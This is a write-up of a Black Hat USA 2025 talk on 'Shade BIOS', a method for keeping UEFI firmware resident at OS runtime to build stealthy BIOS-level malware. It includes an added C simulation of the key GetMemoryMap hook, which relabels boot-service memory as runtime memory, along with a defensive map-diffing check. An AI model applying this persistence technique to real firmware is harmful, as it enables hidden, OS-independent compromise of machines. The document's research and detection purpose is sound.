Black Hat USA 2025 | Shade BIOS: Unleashing the Full Stealth of UEFI Malware

Black Hat | Mar 17, 2026

Why It Matters

Shade BIOS gives attackers a stealthy, hardware‑agnostic foothold below the OS, forcing enterprises to rethink firmware security strategies.

Key Takeaways

  • Existing UEFI malware depends on OS specifics (driver hooks per OS version) or on hardware specifics (device‑specific SMM code).
  • Shade BIOS keeps the UEFI boot‑time environment resident in memory after the OS has booted.
  • Runtime DXE modules carry out the malicious actions purely at BIOS level, with no userland or kernel component.
  • Hooking GetMemoryMap reclassifies boot‑service memory regions as runtime‑service regions so the OS preserves them.
  • The technique operates independently of OS‑level security and needs little device‑specific code.

Summary

At Black Hat USA 2025, Kazuki Matsuo of FFRI Security presented “Shade BIOS,” a method for keeping UEFI firmware functionality alive at OS runtime in order to build fully stealthy, BIOS‑level malware.

He explained that today’s UEFI bootkits and SMM backdoors are limited either by OS dependence, since they require driver hooks and updates for each OS version, or by hardware dependence, since they need device‑specific code. With platform protections such as SMM deprivileging becoming common, many existing approaches are losing effectiveness.

Matsuo demonstrated how hooking the GetMemoryMap boot service and reclassifying EFI boot‑service memory regions as runtime‑service regions in the map it returns causes the OS to preserve those regions after ExitBootServices, so the firmware environment stays resident after the OS loads. He also described solutions for memory allocation, identity‑mapped paging, variable handling, and device reinitialization, citing Dell PowerEdge and HP ProLiant backdoors as examples of earlier work that suffered from narrow target scopes.
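To make the memory‑map reclassification concrete, the following is an added example in C; it is not code from the talk or from FFRI Security. It models a hooked GetMemoryMap that forwards to the original and then rewrites every EfiBootServicesCode/EfiBootServicesData descriptor as EfiRuntimeServicesCode/EfiRuntimeServicesData with EFI_MEMORY_RUNTIME set, which is the simplest form of the idea described above. The UEFI types and constants are those of the UEFI specification; the sample memory map, the stand‑in “original” GetMemoryMap, and the helper names (orig_get_memory_map, hooked_get_memory_map, fetch_map, pages_via, runtime_flag_via) are constructed for this example. The talk’s further handling of allocation, paging, variables and device reinitialization is not modelled here.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Minimal UEFI types and constants as defined in the UEFI specification
 * (reproduced here so the file builds without EDK2 headers). */
typedef uint64_t UINTN;
typedef UINTN    EFI_STATUS;
#define EFI_SUCCESS          0ULL
#define EFI_BUFFER_TOO_SMALL ((1ULL << 63) | 5)
#define EFI_MEMORY_RUNTIME   0x8000000000000000ULL  /* OS must give this region a runtime mapping */

enum { EfiLoaderData = 2, EfiBootServicesCode = 3, EfiBootServicesData = 4,
       EfiRuntimeServicesCode = 5, EfiRuntimeServicesData = 6, EfiConventionalMemory = 7 };

typedef struct {
    uint32_t Type;            /* 4 bytes of alignment padding follow; PhysicalStart is at offset 8 */
    uint64_t PhysicalStart;
    uint64_t VirtualStart;
    uint64_t NumberOfPages;
    uint64_t Attribute;
} EFI_MEMORY_DESCRIPTOR;

typedef EFI_STATUS (*GET_MEMORY_MAP)(UINTN *Size, EFI_MEMORY_DESCRIPTOR *Map, UINTN *Key,
                                     UINTN *DescSize, uint32_t *DescVer);

/* Constructed sample map standing in for what real firmware would return. Firmware
 * usually reports a DescriptorSize larger than sizeof(EFI_MEMORY_DESCRIPTOR) (48 here,
 * versus 40), so every walker below strides by DescriptorSize, never by the struct size. */
#define DESC_SIZE 48
#define N_DESC    5
static const EFI_MEMORY_DESCRIPTOR sample_map[N_DESC] = {
    { EfiConventionalMemory,  0x00000000, 0, 0x80,  0xF },
    { EfiBootServicesCode,    0x7E000000, 0, 0x200, 0xF },   /* DXE driver code, freed at ExitBootServices */
    { EfiBootServicesData,    0x7E200000, 0, 0x400, 0xF },   /* boot-service heap, also freed */
    { EfiRuntimeServicesCode, 0x7E600000, 0, 0x40,  0xF | EFI_MEMORY_RUNTIME },
    { EfiLoaderData,          0x7E640000, 0, 0x10,  0xF },
};

/* Stand-in for the firmware's original gBS->GetMemoryMap, including the usual
 * two-call protocol: a first call with a too-small buffer reports the needed size. */
static EFI_STATUS orig_get_memory_map(UINTN *Size, EFI_MEMORY_DESCRIPTOR *Map, UINTN *Key,
                                      UINTN *DescSize, uint32_t *DescVer) {
    UINTN need = (UINTN)N_DESC * DESC_SIZE;
    *DescSize = DESC_SIZE; *DescVer = 1; *Key = 0x1234;
    if (*Size < need) { *Size = need; return EFI_BUFFER_TOO_SMALL; }
    *Size = need;
    memset(Map, 0, need);
    for (int i = 0; i < N_DESC; i++)
        memcpy((uint8_t *)Map + i * DESC_SIZE, &sample_map[i], sizeof sample_map[i]);
    return EFI_SUCCESS;
}

/* In a real hook this would hold the pointer saved when gBS->GetMemoryMap was replaced. */
static GET_MEMORY_MAP g_orig_get_memory_map = orig_get_memory_map;

/* Hooked GetMemoryMap: forward to the original, then rewrite every boot-service
 * region as a runtime-service region and set EFI_MEMORY_RUNTIME on it. The OS loader
 * acts on this map, so after ExitBootServices it preserves (and, via
 * SetVirtualAddressMap, virtually maps) memory the firmware would otherwise give up. */
static EFI_STATUS hooked_get_memory_map(UINTN *Size, EFI_MEMORY_DESCRIPTOR *Map, UINTN *Key,
                                        UINTN *DescSize, uint32_t *DescVer) {
    EFI_STATUS st = g_orig_get_memory_map(Size, Map, Key, DescSize, DescVer);
    if (st != EFI_SUCCESS) return st;             /* size probe or real error: pass through */
    for (UINTN off = 0; off + *DescSize <= *Size; off += *DescSize) {
        EFI_MEMORY_DESCRIPTOR *d = (EFI_MEMORY_DESCRIPTOR *)((uint8_t *)Map + off);
        if (d->Type == EfiBootServicesCode)      d->Type = EfiRuntimeServicesCode;
        else if (d->Type == EfiBootServicesData) d->Type = EfiRuntimeServicesData;
        else continue;
        d->Attribute |= EFI_MEMORY_RUNTIME;
    }
    return EFI_SUCCESS;
}

/* Fetches a map through fn (probe call, then real call) into buf. Returns the
 * descriptor count, or 0 on failure. */
static UINTN fetch_map(GET_MEMORY_MAP fn, uint8_t *buf, UINTN cap, UINTN *DescSize) {
    UINTN size = 0, key; uint32_t ver;
    if (fn(&size, (EFI_MEMORY_DESCRIPTOR *)buf, &key, DescSize, &ver) != EFI_BUFFER_TOO_SMALL) return 0;
    if (size > cap) return 0;
    if (fn(&size, (EFI_MEMORY_DESCRIPTOR *)buf, &key, DescSize, &ver) != EFI_SUCCESS) return 0;
    return size / *DescSize;
}

/* Total pages of a given memory Type as seen through fn: what an OS loader (or a
 * defender diffing maps) would tally. */
static uint64_t pages_via(GET_MEMORY_MAP fn, uint32_t Type) {
    static uint8_t buf[1024]; UINTN dsz, n = fetch_map(fn, buf, sizeof buf, &dsz);
    uint64_t pages = 0;
    for (UINTN i = 0; i < n; i++) {
        const EFI_MEMORY_DESCRIPTOR *d = (const EFI_MEMORY_DESCRIPTOR *)(buf + i * dsz);
        if (d->Type == Type) pages += d->NumberOfPages;
    }
    return pages;
}

/* 1 if descriptor idx carries EFI_MEMORY_RUNTIME as seen through fn, else 0. */
static int runtime_flag_via(GET_MEMORY_MAP fn, UINTN idx) {
    static uint8_t buf[1024]; UINTN dsz, n = fetch_map(fn, buf, sizeof buf, &dsz);
    if (idx >= n) return 0;
    return (((const EFI_MEMORY_DESCRIPTOR *)(buf + idx * dsz))->Attribute & EFI_MEMORY_RUNTIME) != 0;
}

int main(void) {
    printf("boot-service pages:    original=0x%llx hooked=0x%llx\n",
           (unsigned long long)(pages_via(orig_get_memory_map, EfiBootServicesCode) + pages_via(orig_get_memory_map, EfiBootServicesData)),
           (unsigned long long)(pages_via(hooked_get_memory_map, EfiBootServicesCode) + pages_via(hooked_get_memory_map, EfiBootServicesData)));
    printf("runtime-service pages: original=0x%llx hooked=0x%llx\n",
           (unsigned long long)(pages_via(orig_get_memory_map, EfiRuntimeServicesCode) + pages_via(orig_get_memory_map, EfiRuntimeServicesData)),
           (unsigned long long)(pages_via(hooked_get_memory_map, EfiRuntimeServicesCode) + pages_via(hooked_get_memory_map, EfiRuntimeServicesData)));
    return 0;
}
```

Two practical points follow from the code. Walking by DescriptorSize rather than by sizeof(EFI_MEMORY_DESCRIPTOR) matters: firmware routinely reports a larger stride, and a hook that uses the struct size would skip or corrupt descriptors. The same walk, run by a defender over the memory map the OS loader retained, gives a cheap sanity check: a final map in which boot‑service pages sum to zero while runtime‑service regions have grown by the size of the whole DXE environment is not what normal firmware reports.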

If adopted by attackers, Shade BIOS would enable pure firmware malware that operates independently of OS defenses and without device‑specific drivers, raising the threat level for national‑security systems and cloud providers and prompting a reassessment of firmware‑level security controls.

Original Description

UEFI security has been gaining significant attention, especially in the context of national security and cloud security, due to its high stealth capabilities and strong privileges.
However, existing UEFI malware has only scratched the surface of what BIOS can do. They all eventually perform malbehaviors in userland or the kernel and are dependent on OS-level security after all. There is some research on SMM backdoors that are purely BIOS-implemented, but these implementations tend to be device-dependent, resulting in low-versatility backdoors that only work on a specific PC. Moreover, with the current trend of SMM deprivileging, they won't be able to function anymore.
We propose the concept of "pure-BIOS malware", which operates completely independently of OS-level security and performs malbehaviors without device dependence at runtime. Then, we will introduce Shade BIOS, which makes this possible. Shade BIOS operates like an attacker-exclusive OS by running the BIOS environment, which would normally lose its functionality after OS boot, in the shadow of the OS at runtime.
In this talk, we dive into the technical details of Shade BIOS. Moreover, considering the latest trends in BIOS security, such as SMM deprivileging, we will take a broad perspective on BIOS and examine the optimal entity for pure-BIOS malware. As a starting point for detecting pure-BIOS malware, we will also demonstrate a practical method for detecting Shade BIOS.
By:
Kazuki Matsuo | Security Researcher, FFRI Security, Inc.